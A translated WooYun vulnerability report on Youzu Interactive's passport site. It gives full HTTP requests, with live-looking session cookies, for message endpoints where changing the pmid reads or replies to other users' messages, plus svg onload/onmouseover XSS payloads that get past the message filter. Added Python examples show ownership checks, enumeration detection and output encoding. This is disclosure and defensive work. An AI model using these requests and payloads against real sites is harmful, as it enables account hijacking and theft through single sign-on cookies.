Vulnerability summary

Defect ID: wooyun-2014-088469

Title: Two vulnerabilities hijack every Youzu Interactive (游族网络) member account

Affected vendor: Shanghai Youzu Interactive Co., Ltd.

Author: Forever80s

Submitted: 2014-12-24 18:05

Fixed: 2015-02-07 18:06

Disclosed: 2015-02-07 18:06

Vulnerability type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2014-12-24: Details sent to the vendor, awaiting vendor handling
2014-12-29: Vendor confirmed; details disclosed to the vendor only
2015-01-08: Details disclosed to core white hats and relevant domain experts
2015-01-18: Details disclosed to regular white hats
2015-01-28: Details disclosed to intern white hats
2015-02-07: Details disclosed to the public

Brief description:

Detailed description:

Proof of vulnerability:

1. Multiple horizontal privilege escalation (parallel permission) flaws in the member messaging module
Receiving a message

POST /messages/getMessageInfo HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/index
Content-Length: 10
Cookie: __utma=166915638.999324100.1419312277.1419312277.1419400811.2; __utmz=166915638.1419312277.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419312278,1419400279; PHPSESSID=0pt5ppco1coc2t1cc2o435k9k3; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419400897; uuzu_reg_sms_code=448251090916; uuzu_UAUTH=UXUOPlM1Wm1VYAQ8U2YNTgAdADIAUgZUAUsNLwUVCn8GagppUHFWYl1mB2wAMABmAzVRblQ4UhxcFQ1mU1QCVFFNDilTGVp3VTgEPFMkDWcAMABhAGcGdQFoDSIFZQpsBh8KGlBnVlZdWQdPACgARgMnUW5UYVJyXCsNN1N9AnNRdw4%2FUyZaZFU4BE9TVg1QAD8ATQBPBlkBNA0ZBQwKYwYuCg5QE1ZaXWEHTwAFAE4DYVEKVDFSEVxqDRtTSgJFUTEOClM5WllVfQRbU28NXAA5AFsAXAZRATINGAUMCmQGOwoZUC1WTV04B1gAPABFAzxRHVQdUmlcZg1wU28CZFFpDjRTaVomVWEEdFNwDWcAJwBrAGcGbgE7DRsFGQo1Bmo%3D; uuzu_UNICKNAME=txxxx; uuzu_external_account=tstxxx; __utmb=166915638.4.9.1419400901170; __utmc=166915638; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

pmid=17187

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Dec 2014 06:08:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Set-Cookie: uuzu_UAUTH=V3MBMVo8UGdQZVhgAzYKSVpHUGIDUQBSB00MLlRECn8NYVo5ACEBNVJpVzxRYV07WmwFOghkAE5WH102UlVTBVdLASZaEFB9UD1YYAN0CmBaalAxA2QAcwduDCNUNApsDRRaSgA3AQFSVlcfUXldG1p%2BBToIPQAgViFdZ1J8UyJXcQEwWi9QblA9WBMDBgpXWmVQHQNMAF8HMgwYVF0KYw0lWl4AQwENUm5XH1FUXRNaOAVeCG0AQ1ZgXUtSS1MUVzcBBVowUFNQeFgHAz8KW1pjUAsDXwBXBzQMGVRdCmQNMFpJAH0BGlI3VwhRbV0YWmUFSQhBADtWbF0gUm5TNVdvATtaYFAsUGRYKAMgCmBafVA7A2QAaAc9DBpUSAo1DWE%3D; path=/; domain=.youzu.com
Set-Cookie: uuzu_UNICKNAME=txxx; path=/; domain=.youzu.com
Content-Length: 753
{"status":1,"msg":"<p>\n\t\t\t\t\t\u4eb2\u7231\u7684<span>xiaoqiang27good<\/span>\uff1a\n\t\t\t\t<\/p>\n\t\t\t\t<p style=\"text-indent:20.25pt;\">\n\t\t\t\t\t\u751f\u65e5\u5feb\u4e50\uff01\u611f\u8c22\u60a8\u4e00\u76f4\u4ee5\u6765\u5bf9\u6e38\u65cf\u7684\u652f\u6301\uff0c\u6e38\u65cf\u5e0c\u671b\u60a8\u5728\u672a\u6765\u7684\u4e00\u5e74\u91cc\uff0c\u60a8\u7684\u6bcf\u4e00\u4e2a\u5fc3\u613f\u90fd\u80fd\u5b9e\u73b0\uff0c\u6bcf\u4e00\u4efd\u575a\u6301\u90fd\u6709\u6536\u83b7\u3002\u6e38\u65cf\u613f\u65f6\u523b\u4e0e\u60a8\u5206\u4eab\u7b80\u5355\u7684\u5feb\u4e50\uff01\n\t\t\t\t<\/p>\n\t\t\t\t<p style=\"text-align:right;\">\n\t\t\t\t\t<span style=\"margin-right:35px;\">\u6e38\u65cf\u7f51\u7edc \u00a02014\/05\/01<\/span>\n\t\t\t\t<\/p>\n\t\t\t\t"}


Changing the pmid number in the request returns other members' messages, which makes it possible to enumerate every member's name here, for example xiaoqiang27good.
There is also a horizontal privilege escalation flaw in replying to messages.

POST /messages/reply HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/replyeditor/pmid/19691/to/%3Csvg/onload=console.log(1)
Content-Length: 56
Cookie: __utma=166915638.999324100.1419312277.1419312277.1419400811.2; __utmz=166915638.1419312277.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419312278,1419400279; PHPSESSID=0pt5ppco1coc2t1cc2o435k9k3; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419401436; uuzu_reg_sms_code=448251090916; uuzu_UAUTH=BCBaagZgUWZSZwI6WG1YGwcaW2kBUwRWAkgKKFREBnMGag5tUXADNwE6VzwAMFo8VWMFOgRoD0FUHQ9kXFtXAQQYWn0GTFF8Uj8COlgvWDIHN1s6AWYEdwJrCiVUNAZgBh8OHlFmAwMBBVcfAChaHFVxBToEMQ8vVCMPNVxyVyYEIlprBnNRb1I%2FAklYXVgFBzhbFgFOBFsCNwoeVF0GbwYuDgpREgMPAT1XHwAFWhRVNwVeBGEPTFRiDxlcRVcQBGRaXgZsUVJSegJdWGRYCQc%2BWwABXQRTAjEKH1RdBmgGOw4dUSwDGAFkVwgAPFofVWoFSQRNDzRUbg9yXGBXMQQ8WmAGPFEtUmYCclh7WDIHIFswAWYEbAI4ChxUSAY5Bmo%3D; uuzu_UNICKNAME=tsxxx; uuzu_external_account=txxx; __utmb=166915638.8.9.1419401436913; __utmc=166915638; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

pmid=19690&to=%26lt%3Bsvg&subject=0&message=sdfsdfsdfdsf


Likewise, changing pmid allows replying to any message.
Since sending a message performs no validation at all, we can send a message to any user and reply to any message.
Sending a message

POST /messages/sendMsm HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/smspop
Content-Length: 173
Cookie: __utma=166915638.558191048.1419392229.1419392229.1419399965.2; __utmz=166915638.1419392229.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419392393,1419400227; __utmb=166915638.16.10.1419399965; __utmc=166915638; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419400654; __utmt=1; uuzu_UAUTH=BSFcbFI0BjEANVFpV19YBFVAVz0GVwRVVRcIKQERAXkDH1t%2FA0lSO1NOV29XIFo%2FBDwGagJrVT5VN1s9VVEHUgUSXGpSDAYLABVRLldLWClVS1cvBkMEMVUfCG4BegFiAzFbZgNrUn1TbVcmVztaCAQABkICYlUKVQVbRVVyB0gFLlxPUi8GEQBjURlXO1h1VXZXNAZ9BHFVJQg8AS4BZwNvW0gDUFJNUzdXH1drWgAELwZJAk1VAVU%2FW09VTAduBWRcW1ICBg0AYVEOV2xYFlVxVxsGSgRmVTsICgEIAWQDKFtIAzZSXlNqVx1XQloYBC4GXgJeVTBVYltOVXIHQAUjXExSZwYKADlRGVdHWG5VO1dzBm8EZlU7CDcBYQElAzZbcAN2UmlTd1c7V2laPwRqBkkCS1VuVW8%3D; uuzu_UNICKNAME=axxxx; uuzu_external_account=aaxx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

account=目标用户名&message=xxxxx&from=xxxx

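The three requests above all trust the caller-supplied pmid (or account) as proof of ownership. The following is an added example, not code from the report or from Youzu's code base, of what the server side should have done: bind every message lookup to the session user, and flag sessions that sweep the pmid space. The message store, user names (other than xiaoqiang27good, which the report shows) and log format are constructed for illustration.

```python
from collections import defaultdict

# Constructed message store: pmid -> message with a sender and a recipient. Names are
# placeholders except xiaoqiang27good, which the report shows being disclosed.
MESSAGES = {
    17187: {"from": "youzu_system", "to": "xiaoqiang27good", "body": "Happy birthday!"},
    19690: {"from": "userA", "to": "userB", "body": "see you in game"},
}

class Forbidden(Exception):
    """The session user is neither sender nor recipient of the requested message."""

def get_message_info(session_user: str, pmid: int) -> dict:
    """Ownership-checked /messages/getMessageInfo: the pmid is a lookup key, not a
    capability, so the record is returned only if it belongs to the logged-in user."""
    msg = MESSAGES.get(pmid)
    if msg is None or session_user not in (msg["from"], msg["to"]):
        # Identical error for "missing" and "not yours", so existence cannot be probed.
        raise Forbidden(f"pmid {pmid} not accessible")
    return msg

def can_access(session_user: str, pmid: int) -> bool:
    try:
        get_message_info(session_user, pmid)
        return True
    except Forbidden:
        return False

def reply(session_user: str, pmid: int, body: str) -> dict:
    """/messages/reply: a reply goes to the other party of a thread the caller is in."""
    original = get_message_info(session_user, pmid)
    recipient = original["from"] if session_user == original["to"] else original["to"]
    return {"from": session_user, "to": recipient, "body": body}

def pmid_enumeration_suspects(access_log: list, threshold: int = 20) -> set:
    """Defender-side check over constructed access-log lines of the form
    'SESSION POST /messages/getMessageInfo pmid=NNN': a session that touched more
    distinct pmids than any real inbox holds is walking the id space."""
    seen = defaultdict(set)
    for line in access_log:
        session, _method, path, param = line.split()
        if path == "/messages/getMessageInfo" and param.startswith("pmid="):
            seen[session].add(int(param[len("pmid="):]))
    return {s for s, ids in seen.items() if len(ids) > threshold}

# Constructed log: one session reads its own message, another sweeps 30 consecutive ids.
SAMPLE_LOG = ["sess_a POST /messages/getMessageInfo pmid=17187"] + [
    f"sess_b POST /messages/getMessageInfo pmid={i}" for i in range(17000, 17030)
]
```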

2. Bypassing the XSS filter on messages
Send the following message

POST /messages/sendMsm HTTP/1.1
Host: passport.youzu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://passport.youzu.com/messages/smspop
Content-Length: 100
Cookie: __utma=166915638.558191048.1419392229.1419392229.1419399965.2; __utmz=166915638.1419392229.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_f61970e1ce8b3758b866572e28e07fba=1419392393,1419400227; __utmb=166915638.16.10.1419399965; __utmc=166915638; Hm_lpvt_f61970e1ce8b3758b866572e28e07fba=1419400654; __utmt=1; uuzu_UAUTH=BSFcbFI0BjEANVFpV19YBFVAVz0GVwRVVRcIKQERAXkDH1t%2FA0lSO1NOV29XIFo%2FBDwGagJrVT5VN1s9VVEHUgUSXGpSDAYLABVRLldLWClVS1cvBkMEMVUfCG4BegFiAzFbZgNrUn1TbVcmVztaCAQABkICYlUKVQVbRVVyB0gFLlxPUi8GEQBjURlXO1h1VXZXNAZ9BHFVJQg8AS4BZwNvW0gDUFJNUzdXH1drWgAELwZJAk1VAVU%2FW09VTAduBWRcW1ICBg0AYVEOV2xYFlVxVxsGSgRmVTsICgEIAWQDKFtIAzZSXlNqVx1XQloYBC4GXgJeVTBVYltOVXIHQAUjXExSZwYKADlRGVdHWG5VO1dzBm8EZlU7CDcBYQElAzZbcAN2UmlTd1c7V2laPwRqBkkCS1VuVW8%3D; uuzu_UNICKNAME=axxx; uuzu_external_account=axxx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

account=tste323&message="/><svg/onload=console.log(1)><"\"&from="/><svg/onmouseover=console.log(1) "


This produces XSS, triggered by moving the mouse.

[Screenshot: msg_xss_Capture.PNG]

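The report does not say what the message filter blocked, only that the two field values above got past it. As an added example (not the report's or Youzu's code), the block below renders those exact values through a hypothetical blacklist filter and through contextual HTML encoding, and checks the output for tags the template never wrote. The filter, template and tag check are assumptions made for the illustration.

```python
import html
import re

# The two field values quoted in the report's /messages/sendMsm request.
REPORTED_MESSAGE = '"/><svg/onload=console.log(1)><"\\"'
REPORTED_FROM = '"/><svg/onmouseover=console.log(1) "'

def blacklist_filter(value: str) -> str:
    """Hypothetical blacklist standing in for whatever the site ran (the report does not
    say): it strips <script> elements and the javascript: scheme and nothing else."""
    value = re.sub(r"(?is)<script.*?>.*?</script>", "", value)
    return value.replace("javascript:", "")

def render_inbox_row_unsafe(sender: str, message: str) -> str:
    """Template that trusts the filter and inserts the fields raw (the failing pattern)."""
    return (f'<div class="msg" data-from="{blacklist_filter(sender)}">'
            f'{blacklist_filter(message)}</div>')

def render_inbox_row_safe(sender: str, message: str) -> str:
    """Contextual output encoding: quote=True also encodes the double quote, so an
    attribute value cannot be closed early, and < is encoded so no new tag can start."""
    return (f'<div class="msg" data-from="{html.escape(sender, quote=True)}">'
            f'{html.escape(message, quote=True)}</div>')

# The template only ever emits <div>; any other tag name in the output came from user data.
TEMPLATE_TAGS = {"div"}

def foreign_tags(rendered: str) -> set:
    """Tag names present in rendered HTML that the template did not write itself."""
    found = {t.lower() for t in re.findall(r"<\s*/?\s*([a-zA-Z][\w-]*)", rendered)}
    return found - TEMPLATE_TAGS
```

The same check can be pointed at stored messages as a detection sweep: any row whose rendered form yields a non-empty set was stored with markup that the encoding layer did not neutralise.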

Because the site uses single sign-on, the cookie alone logs you into every system.

[Screenshot: cookie_login_Capture.PNG]

That includes U-coins, PayPal and other electronic currency; you know how serious the impact is.
Only a PoC here.

Fix recommendation:

Copyright notice: when reposting, please credit the source Forever80s@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2014-12-29 16:40

Vendor reply:

We will arrange the fixes and adjustments right away.

Latest status:

None yet